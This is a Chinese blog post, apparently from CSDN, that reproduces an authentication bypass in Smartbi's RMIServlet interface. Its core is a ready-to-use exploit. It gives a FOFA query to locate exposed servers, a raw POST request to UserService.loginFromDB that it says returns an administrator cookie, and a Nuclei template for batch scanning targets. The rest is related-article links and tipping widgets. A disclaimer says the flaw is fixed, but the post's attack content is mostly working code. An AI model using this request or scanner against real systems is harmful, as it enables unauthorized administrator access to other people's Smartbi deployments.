漏洞复现--Smartbi smartbivisionRMIServlet 接口权限绕过漏洞

已于 2023-12-18 19:21:22 修改
阅读量738 收藏 7
点赞数 7
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
于 2023-12-18 19:20:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/135069768
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现,满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。该产品存在接口绕过漏洞,攻击者可通过此漏洞绕过登录流程。

二:漏洞影响版本

Smartbi

三:网络空间测绘查询

fofa
body="gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')"
image.png

四:漏洞复现

image.png
poc:

POST /smartbi/vision/RMIServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 68

className=UserService&methodName=loginFromDB&params=["service","0a"]

image.png
获取到的cookie为管理用户,可直接利用进入后台
image.png

批量检测

id: Smartbi-smartbivisionRMIServlet-interface-permission-bypass 

info:
  name: Smartbi-smartbivisionRMIServlet-interface-permission-bypass 
  author: 芝士土拨鼠
  severity: high
  description: description

requests:
  - raw:
      - |-
        POST /smartbi/vision/RMIServlet HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
        Content-Length: 68

        className=UserService&methodName=loginFromDB&params=["service","0a"]

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'true'
      - type: status
        status:
          - 200

在这里插入图片描述

芝士土包鼠
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Smartbi 权限绕过漏洞复现(QVD-2023-17461)
0xSec
08-09 2583
Smartbi在特定情况下可被获取用户token,未经授权的攻击者可通过这种方式获取管理员权限,从而以管理员权限接管后台,进一步利用可实现任意代码执行。利用此漏洞需目标可出网。
Smartbi内置用户登陆绕过漏洞复现
0xSec
06-19 4284
Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
Smartbi 身份认证绕过漏洞
YJ_12340的博客
07-26 360
因为自己搭建的环境存在一些问题,可能是版本过高的原因,(奇奇怪怪的问题,用户没有权限),所以目前仅仅做概念性验证,对漏洞的原理进行分析。为什么不用原本的登录模式登录,首先原本的登录模式登录是不知道对应的账号和密码的其次我们再对原本的登录逻辑进行简单的分析。这里直接比较的是从数据库中查询出的密码,所以我们就可以直接利用内置的账号和 MD5密码登录。是从数据库中查找用户的密码,根据用户的密码开头的第一位字符,来进行处理比较。我们就注意到从数据库登录的操作也是不需要鉴权就可以进行访问的。
Smartbi 修改用户密码漏洞
jennycisp的博客
09-11 120
通过查看 Smartbi 的补丁包信息,发现存在漏洞在某种特定情况下修改用户的密码,进行简单的复现和分析。
关于Smartbi登录代码逻辑漏洞的动态情报
zmcxyyds的博客
12-25 1327
关于Smartbi登录代码逻辑漏洞的动态情报
漏洞复现 - - - Alibaba Nacos权限认证绕过
weixin_67503304的博客
08-03 4727
Alibaba Nacos权限认证绕过Max HackBar方式进行POST传参,简单易懂,操作方便。
漏洞复现 || Smartbi内置用户登陆绕过
失心少年
07-05 606
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。1.利用此POC出现如下情况则存在漏洞
libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现
Senimo
05-03 1830
CVE-2018-10933 libssh 服务端权限认证绕过漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 libssh 是一个提供 SSH 相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。 二、漏洞影响 libssh 0.6 及更高版本具有身份验证绕过漏洞。 libssh 版本 0.8.4 和 libssh
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8252
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
驾驭数字前沿--欧盟商会网络安全大会活动
SafePloy_SH的博客
05-24 365
SafePloy安策的首席安全顾问在会上做了《2024数据威胁报告主题报告》,并强调,“我们致力于成为企业数字化转型中的安全护航者,携手各行业伙伴,共同驾驭数字前沿的波涛,共创安全、合规、高效的数字未来。关于安策 SafePloy安策成立于2002年,一直专注于数据安全领域,无论是从软件世界的商业化保护、许可、交付,还是 人、设备、物连接网络空间的身份认证以及访问控制,再到数字时代的加密保护,按需加密和控制是我们一直以来秉持的服务理念。“在这个数据即资产的时代,了解并顺应各地的政策导向是企业成功的关键。
web安全渗透测试工具篇(二):sqlmap常用命令和nmap常用命令
HACKONE的博客
05-26 178
这些选项可以用来创建用户自定义函数。--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
网络安全】新的恶意软件:无文件恶意软件GhostHook正在广泛传播
最新发布
par@ish的博客
05-29 754
利用系统工具:它利用操作系统的内置工具或管理脚本,例如PowerShell、Windows Script Host (wscript/wsh)、Mshta.exe等,这些工具通常无需额外下载文件即可执行复杂的命令和脚本,为恶意行为提供了便利。持久化机制:虽然名为“无文件”,但无文件恶意软件可能会通过修改注册表项、设置计划任务或利用合法服务来实现自身的持久化,确保即使系统重启也能继续存在。隐蔽性高:由于缺乏明显的文件痕迹,无文件恶意软件极难被发现,对传统的基于文件的防护措施构成了挑战。
qvd-2023-45061漏洞复现
12-25
qvd-2023-45061漏洞是指某个系统或软件中存在的安全漏洞。为了验证这个漏洞,需要进行漏洞复现,即重现漏洞的过程。首先,需要在具有相同环境和配置的测试系统上进行操作。其次,需要根据漏洞的描述和已知信息,尝试触发漏洞并记录操作步骤和结果。在进行漏洞复现的过程中,需要注意保护好测试环境,避免对系统造成实际危害。 在qvd-2023-45061漏洞复现的过程中,可以尝试利用已知的payload或者编写自定义的代码来触发漏洞,记录漏洞触发的条件和效果。在复现过程中,也可以尝试不同的输入和操作,寻找漏洞的边界和影响范围。同时,需要及时记录复现的过程和结果,以便进一步的分析和修复。 当漏洞成功复现后,应该及时向相关安全团队或厂商报告漏洞,并提供详细的复现过程和结果。漏洞复现的结果将有助于安全团队更好地理解漏洞的本质和影响,有助于及时修复和防范类似的漏洞。此外,漏洞复现也是安全研究和攻防技术提升的重要手段,通过复现漏洞可以加深对漏洞原理和利用方法的理解,提高安全防护和应对能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值